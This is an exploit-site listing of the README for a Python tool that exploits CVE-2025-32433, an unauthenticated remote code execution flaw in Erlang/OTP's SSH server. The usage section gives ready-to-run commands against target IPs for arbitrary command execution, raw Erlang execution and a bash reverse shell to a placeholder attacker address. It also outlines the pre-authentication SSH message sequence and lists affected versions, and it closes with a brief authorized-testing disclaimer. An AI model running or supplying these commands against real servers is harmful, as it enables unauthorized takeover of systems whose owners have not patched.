Exploit for Missing Authentication for Critical Function in Erlang Erlang\/Otp CVE-2025-32433

Name: Exploit for Missing Authentication for Critical Function in Erlang Erlang/Otp CVE-2025-32433
Rating: 5 (3 reviews)
2026-06-08 | CVSS 10.0
## https://sploitus.com/exploit?id=FB0B056A-9CB0-554E-AAF8-7026C77787A0
# CVE-2025-32433 Exploit (Windows Compatible)

Erlang/OTP SSH Unauthenticated Remote Code Execution

## Description

This repository contains an exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in Erlang/OTP SSH server.

**Key Features:**
- ✅ Pre-authentication RCE exploit
- ✅ Fixed for Windows GBK encoding compatibility
- ✅ Works on Erlang/OTP versions ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

## Vulnerability Details

**CVE ID:** CVE-2025-32433  
**Severity:** Critical  
**Impact:** Unauthenticated Remote Code Execution

The vulnerability allows attackers to execute arbitrary system commands on Erlang/OTP SSH servers without authentication by sending specially crafted SSH protocol messages.

## Affected Versions

```
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
```

## Usage

```bash
# Basic command execution
python exploit.py -t  -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
```

## Arguments

```
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute
```

## Windows Encoding Fix

This version fixes the encoding issue present in the original exploit:

**Problem:** Original exploit used Unicode checkmark character (✓, U+2713) which causes GBK encoding errors on Windows:
```
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
```

**Solution:** Replaced Unicode character with standard ASCII `+` character for cross-platform compatibility.

## Technical Details

The exploit works by:
1. Establishing SSH connection and banner exchange
2. Sending SSH_MSG_KEXINIT packet
3. Opening SSH channel with SSH_MSG_CHANNEL_OPEN
4. Sending SSH_MSG_CHANNEL_REQUEST with malicious exec command **before authentication**
5. Executing arbitrary Erlang code via `os:cmd()`

## References

- [GitHub Security Advisory](https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2)
- [Erlang/OTP Commit Fix](https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f)
- [RFC 4254 - SSH Connection Protocol](https://datatracker.ietf.org/doc/html/rfc4254)
- [ProDefense CVE-2025-32433](https://github.com/ProDefense/CVE-2025-32433)

## Patched Versions

- OTP 27.3.3
- OTP 26.2.5.11
- OTP 25.3.2.20

## Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly and only on systems you have explicit permission to test.

## License

MIT License

## Author

Modified for Windows compatibility by chuzouX